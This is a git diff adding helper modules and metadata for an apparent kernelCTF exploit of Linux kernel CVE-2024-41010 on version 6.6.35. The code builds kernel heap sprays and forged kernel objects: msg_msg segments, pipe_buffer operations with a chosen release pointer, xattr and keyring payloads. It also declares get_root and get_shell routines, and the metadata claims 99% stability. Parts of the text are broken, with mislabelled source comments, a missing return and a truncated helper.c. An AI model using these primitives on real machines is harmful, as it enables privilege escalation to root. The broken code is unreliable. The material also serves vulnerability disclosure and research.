b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/Makefile new file mode 100644 index 00000000..77966f2a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/Makefile @@ -0,0 +1,28 @@ +# https://github.com/qwerty-po/kernel_exploit_modules + +# define complier type +CC = gcc +# compile options setting +CFLAGS = -O2 -static +# library link & option setting + +msg_msg.o: msg_msg.c + $(CC) $(CFLAGS) -c $^ + +helper.o: helper.c + $(CC) $(CFLAGS) -c $^ + +xattr.o: xattr.c + $(CC) $(CFLAGS) -c $^ + +LDFLAGS = -lkeyutils +keyring.o: keyring.c + $(CC) $(CFLAGS) $(LDFLAGS) -c $^ + +pipe.o: pipe.c + $(CC) $(CFLAGS) -c $^ + +all: msg_msg.o helper.o xattr.o keyring.o pipe.o + +clean: + rm -f *.o \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.c new file mode 100644 index 00000000..8eb13ed1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.c @@ -0,0 +1,126 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/helper.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +#include "helper.h" + +void panic(char *msg) +{ + perror(msg); + exit(-1); +} + +void print_hex_bytes(uint8_t *buf, int l, int r) +{ + for(int i = l; i < r; i+=0x10) + { + for(int j = 0; j < 0x10 && i + j < r; j++) + { + printf("%02x ", buf[i+j]); + } + printf("\n"); + } +} + +void print_hex_8bytes(uint64_t *buf, int l, int r) +{ + for(int i=l; ics), + [ss] "=r" (r->ss), + [rsp] "=r" (r->rsp), + [rflags] "=r" (r->rflags) + ); + + return r; +} + +uint64_t virt2page(uint64_t virt, uint64_t vmalloc_base, uint64_t vmemmap_base) { + assert((virt & 0xfff) == 0x000); + return (((virt - vmalloc_base) >> 0xc) << 0x6) + vmemmap_base; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.h new file mode 100644 index 00000000..8e554041 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/helper.h @@ -0,0 +1,49 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +#ifndef MODULES_HELPER +#define MODULES_HELPER + +#define KMALLOC_16 (0x10) +#define KMALLOC_32 (0x20) +#define KMALLOC_64 (0x40) +#define KMALLOC_96 (0x60) +#define KMALLOC_128 (0x80) +#define KMALLOC_192 (0xc0) +#define KMALLOC_256 (0x100) +#define KMALLOC_512 (0x200) +#define KMALLOC_1K (0x400) +#define KMALLOC_2K (0x800) +#define KMALLOC_4K (0x1000) +#define KMALLOC_8K (0x2000) +#define KMALLOC_16K (0x4000) +#define KMALLOC_32K (0x8000) +#define KMALLOC_64K (0x10000) +#define KMALLOC_128K (0x20000) + +#define PAGE_SIZE KMALLOC_4K + +void print_hex_bytes(uint8_t *buf, int l, int r); +void print_hex_8bytes(uint64_t *buf, int l, int r); + +void cpu_affinity(int cpu); +void unshare_setup(int flags); + +void get_root(); + +void win(); +void get_shell(); + +struct regs { + uint64_t rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp, rip, rflags; + uint64_t cs, ss, ds, es, fs, gs; +}; +struct regs *save_state(); + +uint64_t virt2page(uint64_t virt, uint64_t vmalloc_base, uint64_t vmemmap_base); + +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.c new file mode 100644 index 00000000..7a2de4cd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.c @@ -0,0 +1,61 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/helper.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "keyring.h" + +key_serial_t create_keyring(char *type, char *description, char *payload, uint64_t objectsz, key_serial_t ringid) +{ + key_serial_t keyring = add_key(type, description, payload, objectsz, ringid); + if(keyring < 0) + perror("add_key"); + return keyring; +} + +key_serial_t create_spec_keyring(char *type, char *description, char *payload, uint64_t objectsz) +{ + return create_keyring(type, description, payload, objectsz, KEY_SPEC_PROCESS_KEYRING); +} + +key_serial_t create_simple_keyring(char *payload, uint64_t objectsz) +{ + return create_spec_keyring(KEYRING_TYPE_USER, payload, payload, objectsz); +} + +struct keyring_ret *read_keyring(key_serial_t ringid, uint64_t sz) +{ + struct keyring_ret *ret = malloc(sizeof(struct keyring_ret)); + ret->size = keyctl_read_alloc(ringid, (void **)&ret->data); +} + +void update_keyring(key_serial_t ringid, char *payload, uint64_t objectsz) +{ + if(keyctl_update(ringid, payload, objectsz) < 0) + perror("keyctl_update"); +} + +void remove_keyring(key_serial_t ringid) +{ + if(keyctl_revoke(ringid) < 0) + perror("keyctl_revoke"); +} + +struct user_key_payload *fake_keyring(void *rcu_next, void *func, uint16_t datalen, char *data) +{ + struct user_key_payload *payload = malloc(USER_KEY_PAYLOAD_SIZE + datalen); + payload->rcu.next = rcu_next; + payload->rcu.func = func; + payload->datalen = datalen; + memcpy(payload->data, data, datalen); + + return payload; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.h new file mode 100644 index 00000000..28049117 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/keyring.h @@ -0,0 +1,64 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +#include +#include + +#ifndef MODULES_KEYRING +#define MODULES_KEYRING + +typedef int32_t key_serial_t; + +#ifndef MODULES_RCU_CALLBACK_HEAD +#define MODULES_RCU_CALLBACK_HEAD +struct callback_head { + struct callback_head *next; + void (*func)(struct callback_head *); +}; +#endif + +struct user_key_payload { + struct callback_head rcu; + short unsigned int datalen; + char data[]; +}; + +struct keyring_ret { + uint64_t size; + char *data; +}; + +#define KEYRING_TYPE_USER "user" +#define KEYRING_TYPE_KEYRING "keyring" +#define KEYRING_TYPE_LOGON "logon" +#define KEYRING_TYPE_BIGKEY "big_key" + +#define USER_KEY_PAYLOAD_SIZE (sizeof(struct user_key_payload)) +#define KEYRING_KMALLOC_32 (0x20 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_64 (0x40 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_128 (0x80 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_256 (0x100 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_512 (0x200 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_1k (0x400 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_2k (0x800 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_4k (0x1000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_8k (0x2000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_16k (0x4000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_32k (0x8000 - USER_KEY_PAYLOAD_SIZE) +#define KEYRING_KMALLOC_64k (0x10000 - USER_KEY_PAYLOAD_SIZE) + +key_serial_t create_keyring(char *type, char *description, char *payload, uint64_t objectsz, key_serial_t ringid); +key_serial_t create_spec_keyring(char *type, char *description, char *payload, uint64_t objectsz); +key_serial_t create_simple_keyring(char *payload, uint64_t objectsz); + +struct keyring_ret *read_keyring(key_serial_t ringid, uint64_t sz); +void update_keyring(key_serial_t ringid, char *payload, uint64_t objectsz); +void remove_keyring(key_serial_t ringid); + +struct user_key_payload *fake_keyring(void *rcu_next, void *func, uint16_t datalen, char *data); +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.c new file mode 100644 index 00000000..6d7e0a39 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.c @@ -0,0 +1,113 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/keyring.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include + +#include +#include +#include + +#include "msg_msg.h" + +#define DEBUG 0 + +int alloc_msg_queue(void) +{ + int msqid = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (msqid == -1) + perror("msgget"); + return msqid; +} + +void insert_msg_msg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext) +{ + assert(msgsz <= objectsz); + struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + objectsz, 1); + + msg->m_type = mtype; + // in kernel, data will fill at [0x30, msgsz-MSG_MSG_HEADER_SIZE) + memset(msg->m_text, '\xbf', objectsz); + memcpy(msg->m_text, mtext, msgsz); + + if (msgsnd(msqid, msg, objectsz, 0) < 0) + perror("msgsnd"); +} + +char *read_msg_msg(int msqid, int64_t mtype, uint64_t msgsz) +{ + struct msg *buf = (struct msg *)calloc(MSG_HEADER_SIZE + msgsz, 1); + uint64_t len = 0; + if ((len = msgrcv(msqid, buf, msgsz, mtype, 0)) < 0) + perror("msgrcv"); + char *target = (char *)calloc(len, 1); + memcpy(target, buf->m_text, len); + return target; +} + +void release_msg_msg(int msqid, int64_t mtype) +{ + read_msg_msg(msqid, mtype, MSG_MSG_KMALLOC_CG_4k); +} + +void insert_msg_msgseg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext) +{ + assert(msgsz <= objectsz); + struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + MSG_MSG_KMALLOC_CG_4k + objectsz, 1); + + msg->m_type = mtype; + // in kernel, data will fill at [0x30, 4k) -> kmalloc-4k + // [0x8, msgsz) -> target slab + memset(msg->m_text, '\xbf', MSG_MSG_KMALLOC_CG_4k + objectsz); + memcpy(msg->m_text + MSG_MSG_KMALLOC_CG_4k, mtext, msgsz); + + #if DEBUG + printf("insert_msg_msgseg: msgsz: 0x%lx\n", MSG_MSG_KMALLOC_CG_4k + objectsz); + #endif + + + if (msgsnd(msqid, msg, MSG_MSG_KMALLOC_CG_4k + objectsz, IPC_NOWAIT) < 0) + perror("msgsnd"); +} + +char *read_msg_msgseg(int msqid, int64_t mtype, uint64_t objectsz) +{ + struct msg *msg = (struct msg *)calloc(MSG_HEADER_SIZE + MSG_MSG_KMALLOC_CG_4k + objectsz, 1); + if (msgrcv(msqid, msg, MSG_MSG_KMALLOC_CG_4k + objectsz, mtype, IPC_NOWAIT) < 0) + perror("msgrcv"); + + char *target = (char *)calloc(objectsz, 1); + memcpy(target, msg->m_text + MSG_MSG_KMALLOC_CG_4k, objectsz); + return target; +} + +void release_msg_msgseg(int msqid, int64_t mtype) +{ + read_msg_msgseg(msqid, mtype, MSG_MSG_KMALLOC_CG_4k + MSG_MSGSEG_KMALLOC_CG_4k); +} + +struct msg_msg *fake_msg_msg(struct list_head *list_next, struct list_head *list_prev, int64_t mtype, int m_ts, void *next, char *mtext, uint64_t datalen) +{ + struct msg_msg *msg = (struct msg_msg *)calloc(MSG_MSG_HEADER_SIZE + datalen, 1); + msg->m_list.next = list_next; + msg->m_list.prev = list_prev; + msg->m_type = mtype; + msg->m_ts = m_ts; + msg->next = next; + memcpy(msg->m_text, mtext, datalen); + + return msg; +} + +struct msg_msgseg *fake_msg_msgseg(struct msg_msgseg *next, char *mtext, uint64_t datalen) +{ + struct msg_msgseg *msgseg = (struct msg_msgseg *)calloc(MSG_MSGSEG_HEADER_SIZE + datalen, 1); + msgseg->next = next; + memcpy(msgseg->m_text, mtext, datalen); + + return msgseg; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.h new file mode 100644 index 00000000..0f0c6e34 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/msg_msg.h @@ -0,0 +1,75 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include + +#include +#include + +#ifndef MODULES_LIST_HEAD +#define MODULES_LIST_HEAD +struct list_head { + struct list_head *next, *prev; +}; +#endif + +#ifndef MODULES_MSG_MSG +#define MODULES_MSG_MSG +struct msg_msg{ + struct list_head m_list; + int64_t m_type; + int m_ts; + struct msg_msgseg *next; + void *security; + char m_text[]; +}; + +struct msg_msgseg { + struct msg_msgseg *next; + char m_text[]; +}; + +struct msg { + int64_t m_type; + char m_text[]; +}; + +#define MSG_HEADER_SIZE sizeof(struct msg) +#define MSG_MSG_HEADER_SIZE sizeof(struct msg_msg) +#define MSG_MSGSEG_HEADER_SIZE sizeof(struct msg_msgseg) + +#define MSG_MSG_KMALLOC_CG_64 (0x40 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_128 (0x80 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_192 (0xc0 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_256 (0x100 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_512 (0x200 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_1k (0x400 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_2k (0x800 - MSG_MSG_HEADER_SIZE) +#define MSG_MSG_KMALLOC_CG_4k (0x1000 - MSG_MSG_HEADER_SIZE) + +#define MSG_MSGSEG_KMALLOC_CG_16 (0x10 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_32 (0x20 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_64 (0x40 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_128 (0x80 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_192 (0xc0 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_256 (0x100 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_512 (0x200 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_1k (0x400 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_2k (0x800 - MSG_MSGSEG_HEADER_SIZE) +#define MSG_MSGSEG_KMALLOC_CG_4k (0x1000 - MSG_MSGSEG_HEADER_SIZE) + +int alloc_msg_queue(void); + +void insert_msg_msg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext); +char *read_msg_msg(int msqid, int64_t mtype, uint64_t msgsz); +void release_msg_msg(int msqid, int64_t mtype); + +void insert_msg_msgseg(int msqid, int64_t mtype, uint64_t objectsz, uint64_t msgsz, char *mtext); +char *read_msg_msgseg(int msqid, int64_t mtype, uint64_t msgsz); +void release_msg_msgseg(int msqid, int64_t mtype); + +struct msg_msg *fake_msg_msg(struct list_head *list_next, struct list_head *list_prev, int64_t mtype, int m_ts, void *next, char *mtext, uint64_t datalen); +struct msg_msgseg *fake_msg_msgseg(struct msg_msgseg *next, char *mtext, uint64_t datalen); +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.c new file mode 100644 index 00000000..9b4734a3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.c @@ -0,0 +1,108 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/msg_msg.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +#include "pipe.h" +#include "helper.h" + +#define DEBUG 0 + +struct pipeio *create_pipeio(void) +{ + struct pipeio *pio = (struct pipeio *)calloc(sizeof(struct pipeio), 1); + if(pipe((int *)&pio->pipe) < 0) + perror("pipe alloc"); + + #if DEBUG + printf("pipe readfd: %d\n", pio->pipe.readfd); + printf("pipe writefd: %d\n", pio->pipe.writefd); + #endif + + pio->is_ops_activated = false; + + return pio; +} + +void activate_ops(struct pipeio *pipe) +{ + char buf[0x10]; + + if(write(pipe->pipe.writefd, "A", 1) < 0) + perror("pipe write & activate ops"); + pipe->is_ops_activated = true; +} + +void resize_pipe(struct pipeio *pipe, uint64_t objectsz) +{ + #if DEBUG + printf("pipe writefd: %d\n", pipe->pipe.writefd); + #endif + + if(fcntl(pipe->pipe.writefd, F_SETPIPE_SZ, objectsz) < 0) + perror("pipe resize"); +} + +void read_pipe(struct pipeio *pipe, char *buf, uint64_t size) +{ + if(read(pipe->pipe.readfd, buf, size) < 0) + perror("pipe read"); +} + +void write_pipe(struct pipeio *pipe, char *buf, uint64_t size) +{ + if(write(pipe->pipe.writefd, buf, size) < 0) + perror("pipe write"); + else + pipe->is_ops_activated = true; +} + +void release_pipe(struct pipeio *pipe) +{ + if(!pipe) + return; + close(pipe->pipe.readfd); + close(pipe->pipe.writefd); + free(pipe); +} + +void trigger_ops_release(struct pipeio *pipe) +{ + if(!pipe->is_ops_activated) + printf("trigger_ops_release: ops not activated\n"); + else + { + close(pipe->pipe.readfd); + close(pipe->pipe.writefd); + } +} + +struct pipe_buffer *fake_pipe_buffer(struct page *page, uint32_t offset, uint32_t len, void *ops, uint32_t flags, unsigned long private_v) +{ + struct pipe_buffer *pb = (struct pipe_buffer *)calloc(sizeof(struct pipe_buffer), 1); + pb->page = page; + pb->offset = offset; + pb->len = len; + pb->ops = ops; + pb->flags = flags; + pb->private_v = private_v; + + return pb; +} + +struct pipe_buf_operations *fake_pipe_buf_ops(void *release) +{ + struct pipe_buf_operations *pbo = (struct pipe_buf_operations *)calloc(sizeof(struct pipe_buf_operations), 1); + pbo->release = release; + + return pbo; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.h new file mode 100644 index 00000000..b136ead5 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/pipe.h @@ -0,0 +1,91 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#include + +#ifndef MODULES_PIPE +#define MODULES_PIPE + +struct pipe_inode_info { + struct pipe_buffer *bufs; + unsigned long nrbufs, curbuf; +}; + +struct pipe_buffer; +struct pipe_buf_operations { + /* + * ->confirm() verifies that the data in the pipe buffer is there + * and that the contents are good. If the pages in the pipe belong + * to a file system, we may need to wait for IO completion in this + * hook. Returns 0 for good, or a negative error value in case of + * error. If not present all pages are considered good. + */ + int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *); + + /* + * When the contents of this pipe buffer has been completely + * consumed by a reader, ->release() is called. + */ + void (*release)(struct pipe_inode_info *, struct pipe_buffer *); + + /* + * Attempt to take ownership of the pipe buffer and its contents. + * ->try_steal() returns %true for success, in which case the contents + * of the pipe (the buf->page) is locked and now completely owned by the + * caller. The page may then be transferred to a different mapping, the + * most often used case is insertion into different file address space + * cache. + */ + bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *); + + /* + * Get a reference to the pipe buffer. + */ + bool (*get)(struct pipe_inode_info *, struct pipe_buffer *); +}; + +struct pipe_buffer { + struct page *page; + unsigned int offset, len; + const struct pipe_buf_operations *ops; + unsigned int flags; + unsigned long private_v; +}; + +struct pipeio { + struct { + int readfd, writefd; + } pipe; + bool is_ops_activated; +}; + +#define PIPE_BUFFER_KMALLOC_CG_64 (PAGE_SIZE) +#define PIPE_BUFFER_KMALLOC_CG_192 (PAGE_SIZE * 4) +#define PIPE_BUFFER_KMALLOC_CG_512 (PAGE_SIZE * 8) +#define PIPE_BUFFER_KMALLOC_CG_1k (PAGE_SIZE * 16) +#define PIPE_BUFFER_KMALLOC_CG_2k (PAGE_SIZE * 32) +#define PIPE_BUFFER_KMALLOC_CG_4k (PAGE_SIZE * 64) +#define PIPE_BUFFER_KMALLOC_CG_8k (PAGE_SIZE * 128) +#define PIPE_BUFFER_KMALLOC_CG_16k (PAGE_SIZE * 256) +#define PIPE_BUFFER_KMALLOC_CG_32k (PAGE_SIZE * 512) +#define PIPE_BUFFER_KMALLOC_CG_64k (PAGE_SIZE * 1024) + +struct pipeio *create_pipeio(void); + +void activate_ops(struct pipeio *pipe); +void resize_pipe(struct pipeio *pipe, uint64_t objectsz); +void read_pipe(struct pipeio *pipe, char *buf, uint64_t size); +void write_pipe(struct pipeio *pipe, char *buf, uint64_t size); +void release_pipe(struct pipeio *pipe); + +void trigger_ops_release(struct pipeio *pipe); + +struct pipe_buffer *fake_pipe_buffer(struct page *page, uint32_t offset, uint32_t len, void *ops, uint32_t flags, unsigned long private_v); +struct pipe_buf_operations *fake_pipe_buf_ops(void *release); +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.c new file mode 100644 index 00000000..c32429cf --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.c @@ -0,0 +1,106 @@ +// https://github.com/qwerty-po/kernel_exploit_modules/xattr.c + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "xattr.h" +#include "helper.h" + +char *gen_xattr_name(char *prefix, char *name) +{ + assert(prefix[strlen(prefix) - 1] == '.'); + char *xattr_name = (char *)calloc(strlen(prefix) + strlen(name) + 1, 1); + strcpy(xattr_name, prefix); + strcat(xattr_name, name); + return xattr_name; +} + +char *gen_xattr_name_fixed_sz(char *prefix, char *name, size_t sz) +{ + assert(prefix[strlen(prefix) - 1] == '.'); + char *xattr_name = (char *)calloc(strlen(prefix) + strlen(name) + sz, 1); + strcpy(xattr_name, prefix); + strcat(xattr_name, name); + memset(xattr_name + strlen(xattr_name), 'A', sz - 1 - strlen(xattr_name)); + name[sz-1] = '\0'; + return xattr_name; +} + +int create_xattr(char *fname, char *name, char *value, uint64_t objectsz, bool panic_on_warn) +{ + int err = 0; + if((err = setxattr(fname, name, value, objectsz, 0)) < 0) + { + if(panic_on_warn) + panic("setxattr"); + else + perror("setxattr"); + } + + return err; +} + +struct xattr_return *read_xattr(char *fname, char *name) +{ + struct xattr_return *ret = (struct xattr_return *)calloc(sizeof(struct xattr_return), 1); + + ret->value = (char *)calloc(0x10000, 1); + if((ret->size = getxattr(fname, name, ret->value, 0x10000)) < 0) + perror("getxattr"); + return ret; +} + +int remove_xattr(char *fname, char *name, bool panic_on_warn) +{ + int err = 0; + if((err = removexattr(fname, name)) < 0) + { + if(panic_on_warn) + panic("removexattr"); + else + perror("removexattr"); + } + return err; +} + +void remove_xattr_noerror(char *fname, char *name) +{ + removexattr(fname, name); +} + +#if MODULES_CONFIG_IS_XATTR_RBTREE +struct simple_xattr *fake_xattr(bool color, struct rb_node *parent, struct rb_node *right, struct rb_node *left, char *name, size_t size, char *value, uint64_t valuesz) +{ + struct simple_xattr *xattr = (struct simple_xattr *)calloc(sizeof(struct simple_xattr) + valuesz, 1); + xattr->rb_node.__rb_parent_color = (uint64_t)parent | color; + xattr->rb_node.rb_right = right; + xattr->rb_node.rb_left = left; + xattr->name = name; + xattr->size = size; + memcpy(xattr->value, value, valuesz); + + return xattr; +} +#else +struct simple_xattr *fake_xattr(struct list_head *next, struct list_head *prev, char *name, size_t size, char *value, uint64_t valuesz) +{ + struct simple_xattr *xattr = (struct simple_xattr *)calloc(sizeof(struct simple_xattr) + valuesz, 1); + xattr->list.next = next; + xattr->list.prev = prev; + xattr->name = name; + xattr->size = size; + memcpy(xattr->value, value, valuesz); + + return xattr; +} +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.h b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.h new file mode 100644 index 00000000..573e6a6d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/modules/xattr.h @@ -0,0 +1,93 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#include + +#ifndef MODULES_SIMPLE_XATTR +#define MODULES_SIMPLE_XATTR + +#define MODULES_CONFIG_IS_XATTR_RBTREE 1 + +#if MODULES_CONFIG_IS_XATTR_RBTREE + +#ifndef MODULES_RB_NODE +#define MODULES_RB_NODE + +#define RB_RED 0 +#define RB_BLACK 1 + +struct rb_node { + uint64_t __rb_parent_color; + struct rb_node *rb_right; + struct rb_node *rb_left; +}; +#endif + +struct simple_xattr { + struct rb_node rb_node; + char * name; + size_t size; + char value[]; +}; + +#else +#ifndef MODULES_LIST_HEAD +#define MODULES_LIST_HEAD +struct list_head { + struct list_head *next, *prev; +}; +#endif + +struct simple_xattr { + struct list_head list; + char * name; + size_t size; + char value[]; +}; + +#endif + +struct xattr_return { + uint64_t size; + char *value; +}; + +#define XATTR_HEADER_SIZE sizeof(struct simple_xattr) +#define XATTR_VALUE_KMALLOC_CG_64 (0x40 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_128 (0x80 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_192 (0xc0 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_256 (0x100 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_512 (0x200 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_1K (0x400 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_2K (0x800 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_4K (0x1000 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_8K (0x2000 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_16K (0x4000 - XATTR_HEADER_SIZE) +#define XATTR_VALUE_KMALLOC_CG_32K (0x8000 - XATTR_HEADER_SIZE) + +#define XATTR_PREFIX_USER "user." +#define XATTR_PREFIX_SYSTEM "system." +#define XATTR_PREFIX_TRUSTED "trusted." +#define XATTR_PREFIX_SECURITY "security." + +char *gen_xattr_name(char *prefix, char *name); +char *gen_xattr_name_fixed_sz(char *prefix, char *name, size_t sz); + +int create_xattr(char *fname, char *name, char *value, uint64_t objectsz, bool panic_on_warn); +struct xattr_return *read_xattr(char *fname, char *name); +int remove_xattr(char *fname, char *name, bool panic_on_warn); +void remove_xattr_noerror(char *fname, char *name); + +#if MODULES_CONFIG_IS_XATTR_RBTREE +struct simple_xattr *fake_xattr(bool color, struct rb_node *parent, struct rb_node *right, struct rb_node *left, char *name, size_t size, char *value, uint64_t valuesz); +#else +struct simple_xattr *fake_xattr(struct list_head *next, struct list_head *prev, char *name, size_t size, char *value, uint64_t valuesz); +#endif + +#endif \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/metadata.json b/pocs/linux/kernelctf/CVE-2024-41010_lts/metadata.json new file mode 100644 index 00000000..8bc72008 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids":[ + "exp183" + ], + "vulnerability":{ + "patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1cb6f0bae50441f4b4b32a28315853b279c7404e", + "cve":"CVE-2024-41010", + "affected_versions":[ + "6.6 - 6.10" + ], + "requirements":{ + "attack_surface":[ + + ], + "capabilities":[ + "CAP_NET_ADMIN" + ], + "kernel_config":[ + "CONFIG_NET_SCHED", + "CONFIG_NET_SCH_INGRESS" + ] + } + }, + "exploits": { + "lts-6.6.35": { + "uses":[ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes":"99%" + } + } + } \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-41010_lts/original.tar.gz new file mode 100644 index 00000000..598bde45 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-41010_lts/original.tar.gz differ